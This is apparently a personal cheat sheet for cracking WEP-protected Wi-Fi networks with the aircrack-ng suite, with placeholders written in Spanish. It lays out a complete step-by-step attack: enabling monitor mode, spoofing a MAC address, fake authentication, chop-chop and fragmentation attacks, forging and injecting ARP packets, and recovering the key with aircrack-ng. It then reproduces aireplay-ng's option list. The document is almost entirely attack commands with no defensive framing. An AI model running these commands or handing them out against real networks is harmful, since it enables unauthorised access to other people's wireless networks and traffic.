OPEN IN WINDOW 1:

View networks:
>>iwconfig => show installed cards
>>ifconfig => show active cards

Enable/disable cards:
>>ifconfig [interfaz] up/down

Enable/disable monitor mode:
>>airmon-ng start [interfaz]
>>airmon-ng stop [interfaz]

Enable/disable cards:
>>ifconfig [interfaz] up/down

Change MAC:
>>macchanger -m MACNUEVA [interfaz]

Enable/disable cards:
>>ifconfig [interfaz] up/down

MONITORING:
>>airodump-ng [interfaz]
>>airodump-ng --encrypt TIPODECIFRADO [interfaz]
STOP WITH CTRL+C

Specific monitoring:
>>airodump-ng -c CANAL --bssid BSSID -w NOMBRECAPTURA [interfaz]
>>aireplay-ng -1 10 -e ESSID -a BSSID -h MACNUESTRA [interfaz]
CHANGE TO AIREPLAY-NG -1 10000 FOR KEEP-ALIVE PACKETS

OPEN IN WINDOW 3:

Chop-chop attack:
>>aireplay-ng -4 -h MACNUESTRA -b BSSID [interfaz]
y = yes
n = no
~NOTE: fragmentation attack: -5

Find the network IP:
>>tcpdump -s 0 -n -e -r ARCHIVO.CAP

Forge an ARP packet:
>>packetforge-ng -0 -a BSSID -h MACNUESTRA -k IP_DEL_AP -l IP_DEL_RANGO -y ARCHIVO.XOR -w NOMBRE_PAQUETE_QUE_QUERAMOS
(-l is a lowercase L)
NOTE:
-k: 255.255.255.255 => default
-l: 255.255.255.255 => default

Inject the forged ARP packet:
>>aireplay-ng -2 -x 1024 -h MACNUESTRA -r ARCHIVO_ARP [interfaz]
(-x takes values between 0 and 1024)

OPEN IN WINDOW 4:

Get the key:
>>aircrack-ng NOMBRECAPTURA-01.cap

If there are connected clients => we do not apply chop-chop

Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection

Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
-j
-k IP
-l IP
-B
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file

Miscellaneous options:
-R
--deauth
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--test : tests injection and quality (-9)